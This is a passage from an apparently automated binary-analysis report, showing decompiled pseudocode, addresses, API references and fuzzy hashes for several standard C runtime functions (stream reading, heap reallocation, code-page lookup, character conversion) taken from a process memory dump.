								_t72 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 0x40)))) + 0x18))(_t112 + 0x48, _t93,  *((intOrPtr*)(_t117 - 0x18)) +  *((intOrPtr*)(_t117 - 0x34)), _t117 - 0x30, _t117 - 0x29, _t117 - 0x28, _t117 - 0x38);
								__eflags = _t72;
								if(_t72 < 0) {
									L22:
									E000B1AB0(_t117 - 0x28);
									L23:
									return E000B5669(_t93, _t112, _t113);
								} else {
									__eflags = _t72 - 1;
									if(_t72 <= 1) {
										__eflags =  *((intOrPtr*)(_t117 - 0x38)) - _t117 - 0x29;
										if( *((intOrPtr*)(_t117 - 0x38)) != _t117 - 0x29) {
											__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
											_t114 =  *((intOrPtr*)(_t117 - 0x28));
											if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
												_t114 = _t117 - 0x28;
											}
											_t77 =  *((intOrPtr*)(_t117 - 0x30));
											_t116 = _t114 - _t77 +  *((intOrPtr*)(_t117 - 0x18));
											__eflags = _t116;
											if(__eflags <= 0) {
												L21:
												_t113 =  *(_t117 - 0x29) & 0x000000ff;
												goto L22;
											} else {
												goto L34;
											}
											while(1) {
												L34:
												_push( *((intOrPtr*)(_t112 + 0x50)));
												_t116 = _t116 - 1;
												_push( *((char*)(_t116 + _t77)));
												E000B6931(_t93, _t112, _t116, __eflags);
												__eflags = _t116;
												if(__eflags <= 0) {
													goto L21;
												}
												_t77 =  *((intOrPtr*)(_t117 - 0x30));
											}
											goto L21;
										}
										__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
										_t103 =  *((intOrPtr*)(_t117 - 0x28));
										if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
											_t103 = _t117 - 0x28;
										}
										_t81 =  *((intOrPtr*)(_t117 - 0x30)) - _t103;
										__eflags = _t81;
										_push(_t81);
										E000B1ED0(_t117 - 0x28, 0);
										L28:
										_push( *((intOrPtr*)(_t112 + 0x50)));
										_t62 = E000B61A9(_t93, _t112, _t113, __eflags);
										continue;
									}
									__eflags = _t72 - 3;
									if(_t72 != 3) {
										goto L22;
									}
									__eflags =  *((intOrPtr*)(_t117 - 0x18)) - 1;
									if(__eflags < 0) {
										goto L28;
									}
									__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
									_t83 =  *((intOrPtr*)(_t117 - 0x28));
									if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
										_t83 = _t117 - 0x28;
									}
									E000B69A6(_t117 - 0x29, 1, _t83, 1);
									goto L21;
								}
							}
							goto L22;
						}
						 *((char*)(_t117 - 0x2a)) = 0;
						_t60 = E000B2652(__eflags, _t117 - 0x2a,  *((intOrPtr*)(_t112 + 0x50)));
						__eflags = _t60;
						if(_t60 == 0) {
							goto L4;
						}
						goto L23;
					}
					L4:
					goto L23;
				}
				_t109 =  *(__ecx + 0x2c);
				_t113 =  *_t109;
				_t60 = _t113 + _t95;
				if(_t95 >= _t113 + _t95) {
					goto L3;
				}
				 *_t109 = _t113 - 1;
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) + 1;
				goto L23;
			}

0x000b31c4
0x000b31c4
0x000b31cb
0x000b31d0
0x000b31d2
0x000b31d5
0x000b31d9
0x000b31fe
0x000b31fe
0x000b3200
0x000b3203
0x000b320f
0x000b3214
0x000b3217
0x000b3237
0x000b323e
0x000b3241
0x000b3244
0x000b3247
0x000b324a
0x000b324f
0x000b3314
0x000b3315
0x000b3317
0x00000000
0x00000000
0x000b325d
0x000b3262
0x000b3266
0x000b3269
0x000b3273
0x000b326b
0x000b326b
0x000b326b
0x000b3276
0x000b327a
0x000b327c
0x000b327c
0x000b32a0
0x000b32a3
0x000b32a5
0x000b32d8
0x000b32db
0x000b32e2
0x000b32e7
0x000b32a7
0x000b32a7
0x000b32aa
0x000b32eb
0x000b32ee
0x000b331f
0x000b3323
0x000b3326
0x000b3328
0x000b3328
0x000b332b
0x000b3330
0x000b3333
0x000b3335
0x000b32d4
0x000b32d4
0x00000000
0x00000000
0x00000000
0x00000000
0x000b3337
0x000b3337
0x000b3337
0x000b333a
0x000b333f
0x000b3340
0x000b3347
0x000b3349
0x00000000
0x00000000
0x000b334b
0x000b334b
0x00000000
0x000b3337
0x000b32f0
0x000b32f4
0x000b32f7
0x000b32f9
0x000b32f9
0x000b32ff
0x000b32ff
0x000b3301
0x000b3307
0x000b330c
0x000b330c
0x000b330f
0x00000000
0x000b330f
0x000b32ac
0x000b32af
0x00000000
0x00000000
0x000b32b1
0x000b32b5
0x00000000
0x00000000
0x000b32b7
0x000b32bb
0x000b32be
0x000b32c0
0x000b32c0
0x000b32cc
0x00000000
0x000b32d1
0x000b32a5
0x00000000
0x000b331d
0x000b3220
0x000b3223
0x000b322a
0x000b322c
0x00000000
0x00000000
0x00000000
0x000b322e
0x000b3205
0x00000000
0x000b3205
0x000b31db
0x000b31de
0x000b31e0
0x000b31e5
0x00000000
0x00000000
0x000b31ea
0x000b31f4
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 000B31CB
_fgetc.LIBCMT ref: 000B330F
_ungetc.LIBCMT ref: 000B3340

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3__fgetc_ungetc
String ID:
API String ID: 1616942180-0
Opcode ID: 38fff66a9c3254982cc0fc8c2b48fb4d9757e428397393d6ad57d8a1c7eeec6f
Instruction ID: efcbf44247f31c0cbc9a48661301f7414af672ee214f79221495e172bab463b3
Opcode Fuzzy Hash: 38fff66a9c3254982cc0fc8c2b48fb4d9757e428397393d6ad57d8a1c7eeec6f
Instruction Fuzzy Hash: FE515F71A0421AEFDF15DFA8C4819EEBBB5FF08314F64052AE501B7241DB31EA84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 000BF5DC, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E000BF5DC(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x108ce4, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x1097bc - _t7;
								if(__eflags == 0) {
									_t9 = E000B4C53(__eflags);
									 *_t9 = E000B4C66(GetLastError());
									goto L17;
								} else {
									__eflags = E000BB5A2(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E000B4C53(__eflags);
										 *_t12 = E000B4C66(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E000BB5A2(_t6, _t31);
						 *((intOrPtr*)(E000B4C53(__eflags))) = 0xc;
						goto L12;
					} else {
						E000B4434(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E000B5AFA(__ebx, __edx, __edi, _a8);
				}
			}

0x000bf5e3
0x000bf5f1
0x000bf5f4
0x000bf5f6
0x000bf605
0x000bf638
0x000bf638
0x000bf63b
0x00000000
0x00000000
0x000bf608
0x000bf60a
0x000bf60c
0x000bf60c
0x000bf60c
0x000bf619
0x000bf61f
0x000bf621
0x000bf623
0x000bf683
0x000bf683
0x000bf625
0x000bf625
0x000bf62b
0x000bf66d
0x000bf681
0x00000000
0x000bf62d
0x000bf634
0x000bf636
0x000bf655
0x000bf669
0x000bf64f
0x000bf64f
0x000bf64f
0x00000000
0x00000000
0x00000000
0x000bf636
0x000bf62b
0x00000000
0x000bf651
0x000bf63e
0x000bf649
0x00000000
0x000bf5f8
0x000bf5fb
0x000bf601
0x000bf601
0x000bf652
0x000bf654
0x000bf5e5
0x000bf5ef
0x000bf5ef

APIs

_malloc.LIBCMT ref: 000BF5E8

Part of subcall function 000B5AFA: __FF_MSGBANNER.LIBCMT ref: 000B5B11
Part of subcall function 000B5AFA: __NMSG_WRITE.LIBCMT ref: 000B5B18
Part of subcall function 000B5AFA: HeapAlloc.KERNEL32(013C0000,00000000,00000001,00000000,?,00000000,?,000B7CE2,00000000,00000000,00000000,?,?,000B6B89,00000018,000CD290), ref: 000B5B3D

_free.LIBCMT ref: 000BF5FB

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 772eb4c8d44c2a3839bb79fae640783eb255353a1e58ca9dfec796559d8e7d2c
Instruction ID: a70309fdef25912bfa37fbab4dcb432e4bd38862c18446e59d4db47a9ecedd44
Opcode Fuzzy Hash: 772eb4c8d44c2a3839bb79fae640783eb255353a1e58ca9dfec796559d8e7d2c
Instruction Fuzzy Hash: 4A11E332905617ABCBB02F78AC46BED3BD4AB14360B21C139FD5997162DE7489408B98

Uniqueness

Uniqueness Score: -1.00%

Function 000B2D71, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E000B2D71(void* __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t66;
				signed int _t74;
				signed int _t76;
				void* _t78;
				signed int _t80;
				signed int _t86;
				signed int _t89;
				intOrPtr _t92;
				signed int _t104;
				signed int* _t105;
				signed int* _t106;
				void* _t108;
				signed int _t110;
				void* _t111;
				void* _t112;

				_push(0x30);
				E000B56AB(E000C6E37, __ebx, __edi, __esi);
				_t108 = __ecx;
				_t86 =  *(_t111 + 8);
				_t110 = __esi | 0xffffffff;
				if(_t86 != _t110) {
					_t89 =  *( *(__ecx + 0x20));
					__eflags = _t89;
					if(_t89 == 0) {
						L6:
						__eflags =  *(_t108 + 0x50);
						if( *(_t108 + 0x50) == 0) {
							L34:
							L35:
							return E000B5669(_t86, _t108, _t110);
						}
						E000B2C02(_t108);
						__eflags =  *(_t108 + 0x40);
						if(__eflags != 0) {
							 *(_t111 - 0x34) = _t86;
							 *((intOrPtr*)(_t111 - 0x14)) = 0xf;
							 *((intOrPtr*)(_t111 - 0x18)) = 0;
							 *(_t111 - 0x28) = 0;
							E000B1E00(_t111 - 0x28, 8, 0);
							_t14 = _t111 - 4;
							 *_t14 =  *(_t111 - 4) & 0x00000000;
							__eflags =  *_t14;
							while(1) {
								L11:
								_t66 =  *(_t111 - 0x28);
								_t92 =  *((intOrPtr*)(_t111 - 0x14));
								 *(_t111 - 0x30) = _t66;
								while(1) {
									__eflags = _t92 - 0x10;
									if(_t92 < 0x10) {
										_t66 = _t111 - 0x28;
									}
									 *(_t111 - 0x2c) = _t66;
									__eflags = _t92 - 0x10;
									if(_t92 < 0x10) {
										 *(_t111 - 0x30) = _t111 - 0x28;
									}
									_t74 =  *((intOrPtr*)( *( *(_t108 + 0x40)) + 0x1c))(_t108 + 0x48, _t111 - 0x34, _t111 - 0x33, _t111 - 0x3c,  *(_t111 - 0x30),  *((intOrPtr*)(_t111 - 0x18)) +  *(_t111 - 0x2c), _t111 - 0x38);
									_t86 =  *(_t111 + 8);
									__eflags = _t74;
									if(_t74 < 0) {
										break;
									}
									__eflags = _t74 - 1;
									if(_t74 > 1) {
										__eflags = _t74 - 3;
										if(__eflags != 0) {
											break;
										}
										_t76 = E000B2672(__eflags,  *(_t111 - 0x34),  *(_t108 + 0x50));
										__eflags = _t76;
										if(_t76 == 0) {
											break;
										}
										L32:
										_t110 = _t86;
										break;
									}
									_t92 =  *((intOrPtr*)(_t111 - 0x14));
									_t66 =  *(_t111 - 0x28);
									 *(_t111 - 0x30) = _t66;
									__eflags = _t92 - 0x10;
									if(_t92 < 0x10) {
										 *(_t111 - 0x2c) = _t111 - 0x28;
									} else {
										 *(_t111 - 0x2c) = _t66;
									}
									_t104 =  *((intOrPtr*)(_t111 - 0x38)) -  *(_t111 - 0x2c);
									__eflags = _t104;
									 *(_t111 - 0x2c) = _t104;
									if(_t104 == 0) {
										L26:
										__eflags =  *((intOrPtr*)(_t111 - 0x3c)) - _t111 - 0x34;
										_t86 =  *(_t111 + 8);
										 *((char*)(_t108 + 0x45)) = 1;
										if( *((intOrPtr*)(_t111 - 0x3c)) != _t111 - 0x34) {
											goto L32;
										}
										__eflags = _t104;
										if(_t104 != 0) {
											continue;
										}
										__eflags =  *((intOrPtr*)(_t111 - 0x18)) - 0x20;
										if( *((intOrPtr*)(_t111 - 0x18)) >= 0x20) {
											break;
										}
										E000B1BE0(_t66, _t111 - 0x28, 8, _t104);
										goto L11;
									} else {
										__eflags = _t92 - 0x10;
										if(__eflags < 0) {
											_t66 = _t111 - 0x28;
										}
										_push( *(_t108 + 0x50));
										_push(_t104);
										_push(1);
										_push(_t66);
										_t78 = E000B66CD(_t86, _t104, _t108, _t110, __eflags);
										_t104 =  *(_t111 - 0x2c);
										_t112 = _t112 + 0x10;
										__eflags = _t104 - _t78;
										if(_t104 != _t78) {
											break;
										} else {
											_t66 =  *(_t111 - 0x28);
											_t92 =  *((intOrPtr*)(_t111 - 0x14));
											 *(_t111 - 0x30) = _t66;
											goto L26;
										}
									}
								}
								E000B1AB0(_t111 - 0x28);
								goto L34;
							}
						}
						_t80 = E000B2672(__eflags, _t86,  *(_t108 + 0x50));
						__eflags = _t80;
						if(_t80 == 0) {
							_t86 = _t110;
						}
						L5:
						goto L35;
					}
					_t105 =  *(__ecx + 0x30);
					__eflags = _t89 -  *_t105 + _t89;
					if(_t89 >=  *_t105 + _t89) {
						goto L6;
					}
					 *_t105 =  *_t105 - 1;
					__eflags =  *_t105;
					_t106 =  *(__ecx + 0x20);
					_t110 =  *_t106;
					 *_t106 = _t110 + 1;
					 *_t110 = _t86;
					goto L5;
				}
				goto L35;
			}

0x000b2d71
0x000b2d78
0x000b2d7d
0x000b2d7f
0x000b2d82
0x000b2d87
0x000b2d93
0x000b2d95
0x000b2d97
0x000b2db9
0x000b2db9
0x000b2dbd
0x000b2ef0
0x000b2ef2
0x000b2ef7
0x000b2ef7
0x000b2dc5
0x000b2dcc
0x000b2dcf
0x000b2dea
0x000b2ded
0x000b2df4
0x000b2df7
0x000b2dfa
0x000b2dff
0x000b2dff
0x000b2dff
0x000b2e03
0x000b2e03
0x000b2e03
0x000b2e06
0x000b2e09
0x000b2e0c
0x000b2e0c
0x000b2e0f
0x000b2e11
0x000b2e11
0x000b2e14
0x000b2e17
0x000b2e1a
0x000b2e1f
0x000b2e1f
0x000b2e45
0x000b2e48
0x000b2e4b
0x000b2e4d
0x00000000
0x00000000
0x000b2e53
0x000b2e56
0x000b2ed0
0x000b2ed3
0x00000000
0x00000000
0x000b2edb
0x000b2ee2
0x000b2ee4
0x00000000
0x00000000
0x000b2ee6
0x000b2ee6
0x00000000
0x000b2ee6
0x000b2e58
0x000b2e5b
0x000b2e5e
0x000b2e61
0x000b2e64
0x000b2e6e
0x000b2e66
0x000b2e66
0x000b2e66
0x000b2e74
0x000b2e74
0x000b2e77
0x000b2e7a
0x000b2ea3
0x000b2ea6
0x000b2ea9
0x000b2eac
0x000b2eb0
0x00000000
0x00000000
0x000b2eb2
0x000b2eb4
0x00000000
0x00000000
0x000b2eba
0x000b2ebe
0x00000000
0x00000000
0x000b2ec6
0x00000000
0x000b2e7c
0x000b2e7c
0x000b2e7f
0x000b2e81
0x000b2e81
0x000b2e84
0x000b2e87
0x000b2e88
0x000b2e8a
0x000b2e8b
0x000b2e90
0x000b2e93
0x000b2e96
0x000b2e98
0x00000000
0x000b2e9a
0x000b2e9a
0x000b2e9d
0x000b2ea0
0x00000000
0x000b2ea0
0x000b2e98
0x000b2e7a
0x000b2eeb
0x00000000
0x000b2eeb
0x000b2e03
0x000b2dd5
0x000b2ddc
0x000b2dde
0x000b2de0
0x000b2de0
0x000b2db2
0x00000000
0x000b2db2
0x000b2d99
0x000b2da0
0x000b2da2
0x00000000
0x00000000
0x000b2da4
0x000b2da4
0x000b2da6
0x000b2da9
0x000b2dae
0x000b2db0
0x00000000
0x000b2db0
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 000B2D78

Strings

, xrefs: 000B2EBA

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_
String ID:
API String ID: 2427045233-3916222277
Opcode ID: 384fe9ae74d076ee5e825afd98f5d246d18a437af1cf85b4497600df394c074d
Instruction ID: 049b04700e75c6b84b71b36ccba3d1fa9fd591eadb9289fd72a8517bcfff5d06
Opcode Fuzzy Hash: 384fe9ae74d076ee5e825afd98f5d246d18a437af1cf85b4497600df394c074d
Instruction Fuzzy Hash: 05518D75A0020AAFDF14DFA8C890AEEBBB5FF18310F14452AE911B7641D730E985CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 000C2A2B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C2A2B(char _a4, intOrPtr _a8) {
				intOrPtr _t12;
				short* _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E000C24F2(_t28, ?str?) != 0) {
					if(E000C24F2(_t28, ?str?) != 0) {
						return E000C433E(_t28);
					}
					if(E000BF550(_a8 + 0x250, _a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(E000BF550(_a8 + 0x250, _a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t12 = _a4;
				if(_t12 == 0) {
					return GetACP();
				}
				return _t12;
			}

0x000c2a2f
0x000c2a34
0x000c2a5c
0x00000000
0x000c2a8a
0x000c2a7c
0x000c2aad
0x00000000
0x000c2aad
0x00000000
0x000c2a7e
0x000c2aab
0x00000000
0x00000000
0x000c2ab1
0x000c2ab6
0x000c2aba
0x000c2aba
0x000c2a83

APIs

_wcscmp.LIBCMT ref: 000C2A42
_wcscmp.LIBCMT ref: 000C2A53

Part of subcall function 000BF550: GetLocaleInfoEx.KERNEL32(00000000,00000000,00000002,?,?,000BB501,?,?,?,00000002,00000000,00000000,00000000), ref: 000BF55F

Strings

ACP, xrefs: 000C2A3C
OCP, xrefs: 000C2A4D

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _wcscmp$InfoLocale
String ID: ACP$OCP
API String ID: 2268238039-711371036
Opcode ID: 1e48f3d10f2af47a941157174e20f1d9c66ad0beb5d6149ec89146a0eefb226f
Instruction ID: 89e88deed39732bd6a86feea3973ea5f5c2a5c302ed6bca6596e5332958c8c6f
Opcode Fuzzy Hash: 1e48f3d10f2af47a941157174e20f1d9c66ad0beb5d6149ec89146a0eefb226f
Instruction Fuzzy Hash: 8E01402664061667EB74AB6CDC42FEE33D89F10765F048429FE04DA9C2E670DA418696

Uniqueness

Uniqueness Score: -1.00%

Function 000B75D3, Relevance: 6.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E000B75D3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed char* _t38;
				intOrPtr _t39;
				intOrPtr _t62;
				signed int _t63;
				signed char _t65;
				signed char _t66;
				intOrPtr _t88;
				signed char _t89;
				intOrPtr* _t91;
				signed char* _t94;
				intOrPtr _t95;
				void* _t96;

				_push(0xc);
				_push(0xcd398);
				E000BAF40(__ebx, __edi, __esi);
				_t62 = 0;
				_t38 =  *(_t96 + 0x10);
				_t65 = _t38[4];
				if(_t65 == 0 ||  *((intOrPtr*)(_t65 + 8)) == 0) {
					L27:
					_t39 = 0;
				} else {
					_t66 = _t38[8];
					if(_t66 != 0 || ( *_t38 & 0x80000000) != 0) {
						_t89 =  *_t38;
						_t91 =  *((intOrPtr*)(_t96 + 0xc));
						if(_t89 >= 0) {
							_t91 = _t91 + 0xc + _t66;
						}
						 *((intOrPtr*)(_t96 - 4)) = _t62;
						_push(1);
						if((_t89 & 0x00000008) == 0) {
							_t94 =  *(_t96 + 0x14);
							_t17 =  *((intOrPtr*)(_t96 + 8)) + 0x18; // 0x36b4e8
							_push( *_t17);
							if(( *_t94 & 0x00000001) == 0) {
								if(_t94[0x18] != _t62) {
									if(E000BF491() == 0) {
										goto L25;
									} else {
										_push(1);
										if(E000BF491(_t91) == 0 || E000BF491(_t94[0x18]) == 0) {
											goto L25;
										} else {
											_t63 = 0;
											_t62 = (_t63 & 0xffffff00 | ( *_t94 & 0x00000004) != 0x00000000) + 1;
											 *((intOrPtr*)(_t96 - 0x1c)) = _t62;
										}
									}
								} else {
									if(E000BF491() == 0) {
										goto L25;
									} else {
										_push(1);
										if(E000BF491(_t91) == 0) {
											goto L25;
										} else {
											_t29 =  *((intOrPtr*)(_t96 + 8)) + 0x18; // 0x36b4e8
											E000B3DF0(_t91, E000B7520( *_t29,  &(_t94[8])), _t94[0x14]);
										}
									}
								}
							} else {
								if(E000BF491() == 0) {
									goto L25;
								} else {
									_push(1);
									if(E000BF491(_t91) == 0) {
										goto L25;
									} else {
										_t22 =  *((intOrPtr*)(_t96 + 8)) + 0x18; // 0x36b4e8
										E000B3DF0(_t91,  *_t22, _t94[0x14]);
										if(_t94[0x14] == 4 &&  *_t91 != 0) {
											_push( &(_t94[8]));
											_push( *_t91);
											goto L10;
										}
									}
								}
							}
						} else {
							_t95 =  *((intOrPtr*)(_t96 + 8));
							_t12 = _t95 + 0x18; // 0x36b4e8
							if(E000BF491( *_t12) == 0) {
								L25:
								E000BD93C();
							} else {
								_push(1);
								if(E000BF491(_t91) == 0) {
									goto L25;
								} else {
									_t13 = _t95 + 0x18; // 0x36b4e8
									_t88 =  *_t13;
									 *_t91 = _t88;
									_push( &(( *(_t96 + 0x14))[8]));
									_push(_t88);
									L10:
									 *_t91 = E000B7520();
								}
							}
						}
						 *((intOrPtr*)(_t96 - 4)) = 0xfffffffe;
						_t39 = _t62;
					} else {
						goto L27;
					}
				}
				return E000BAF85(_t39);
			}

0x000b75d3
0x000b75d5
0x000b75da
0x000b75df
0x000b75e1
0x000b75e4
0x000b75e9
0x000b7750
0x000b7750
0x000b75f8
0x000b75f8
0x000b75fd
0x000b760b
0x000b760d
0x000b7612
0x000b7617
0x000b7617
0x000b7619
0x000b761c
0x000b7621
0x000b7665
0x000b766b
0x000b766b
0x000b7671
0x000b76c4
0x000b7708
0x00000000
0x000b770a
0x000b770a
0x000b7716
0x00000000
0x000b7725
0x000b772a
0x000b772e
0x000b772f
0x000b772f
0x000b7716
0x000b76c6
0x000b76cf
0x00000000
0x000b76d1
0x000b76d1
0x000b76dd
0x00000000
0x000b76df
0x000b76e9
0x000b76f5
0x000b76fa
0x000b76dd
0x000b76cf
0x000b7673
0x000b767c
0x00000000
0x000b7682
0x000b7682
0x000b768e
0x00000000
0x000b7694
0x000b769a
0x000b769e
0x000b76aa
0x000b76bc
0x000b76bd
0x00000000
0x000b76bd
0x000b76aa
0x000b768e
0x000b767c
0x000b7623
0x000b7623
0x000b7626
0x000b7632
0x000b7734
0x000b7734
0x000b7638
0x000b7638
0x000b7644
0x00000000
0x000b764a
0x000b764a
0x000b764a
0x000b764d
0x000b7655
0x000b7656
0x000b7657
0x000b765e
0x000b765e
0x000b7644
0x000b7632
0x000b7739
0x000b7740
0x00000000
0x00000000
0x00000000
0x000b75fd
0x000b7757

APIs

___AdjustPointer.LIBCMT ref: 000B7657
_memmove.LIBCMT ref: 000B769E
___AdjustPointer.LIBCMT ref: 000B76EC
_memmove.LIBCMT ref: 000B76F5

Memory Dump Source

Source File: 00000000.00000002.211771003.00000000000B1000.00000020.00020000.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.211753671.00000000000B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211853475.00000000000C8000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211880599.00000000000CF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211900984.00000000000D0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.212111196.000000000010C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AdjustPointer_memmove
String ID:
API String ID: 1721217611-0
Opcode ID: 50b91c211aada02623759827b3282e058b6e7277fe770ddbae4476f06e5a9b83
Instruction ID: ec10fab7ddb1533819dda0b28a67a1b6df7a1ed5985cdf37a889d81f317f431d
Opcode Fuzzy Hash: 50b91c211aada02623759827b3282e058b6e7277fe770ddbae4476f06e5a9b83
Instruction Fuzzy Hash: 7E41813524C703AEEB295F24D882BFA73E49F91324F25402DF8498A192DF71E882E655

Uniqueness

Uniqueness Score: -1.00%

Function 000C3021, Relevance: 6.1, APIs: 4, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C3021(void* __edx, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				void* __ebx;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t60;
				char* _t63;

				_t63 = _a8;
				if(_t63 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t63 != 0) {
					E000B4CA7(_t50,  &_v20, __edx, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E000C01D3( *_t63 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t60 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t63, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t60;
							}
							L20:
							_t44 = E000B4C53(__eflags);
							_t60 = _t60 | 0xffffffff;
							__eflags = _t60;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t60 = _v20;
						__eflags =  *(_t60 + 0x74) - 1;
						if( *(_t60 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t60 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t63[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t60 =  *(_t60 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t60 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t60 + 4), 9, _t63,  *(_t60 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t60 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t63 & 0x000000ff;
					}
					_t60 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x000c3029
0x000c302e
0x000c3048
0x00000000
